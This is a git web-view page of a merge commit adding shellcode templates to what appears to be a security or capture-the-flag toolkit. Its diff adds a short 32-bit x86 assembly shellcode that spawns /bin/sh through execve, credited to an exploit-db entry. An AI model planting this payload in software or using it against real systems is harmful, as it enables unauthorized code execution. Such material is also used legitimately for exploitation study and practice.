diff options
author | Malfurious <m@lfurio.us> | 2021-08-22 10:24:45 -0400 |
---|---|---|
committer | Malfurious <m@lfurio.us> | 2021-08-22 10:24:45 -0400 |
commit | ad0ff4ede0e35d7c70fa0469f94f526196fa8ad4 (patch) | |
tree | 64258b519fa6ea1a36cdf50a7f7bf20567098d13 /templates/shellcode/shell32.asm | |
parent | 442640f100727a081cf26460992465386fe3a633 (diff) | |
parent | 083f76002476dd722a2989cf2c33d0e616e3fd84 (diff) | |
download | lib-des-gnux-ad0ff4ede0e35d7c70fa0469f94f526196fa8ad4.tar.gz lib-des-gnux-ad0ff4ede0e35d7c70fa0469f94f526196fa8ad4.zip |
Merge branch 'shellcode-templates'
This is content from an old repo of mine. I think it makes much more
sense to merge it into lib-des-gnux.
templates/shellcode/ will track any useful shellcode recipes and
contains utilities for building them into ready-to-use payloads.
* shellcode-templates:
Globally ignore all build artifacts
Add Makefile for shellcode templates
Refactor genhex into shelltool
Add sys_exit shellcode templates
Add generic /bin/sh shellcode templates
Diffstat (limited to '')
-rw-r--r-- | templates/shellcode/shell32.asm | 14 |
1 files changed, 14 insertions, 0 deletions
diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm new file mode 100644 index 0000000..d12910f --- /dev/null +++ b/templates/shellcode/shell32.asm @@ -0,0 +1,14 @@ +[SECTION .text] +global _start + +; https://www.exploit-db.com/shellcodes/46809 + +_start: + xor ecx, ecx + push 0xb + pop eax + push ecx + push 0x68732f2f + push 0x6e69622f + mov ebx, esp + int 0x80 |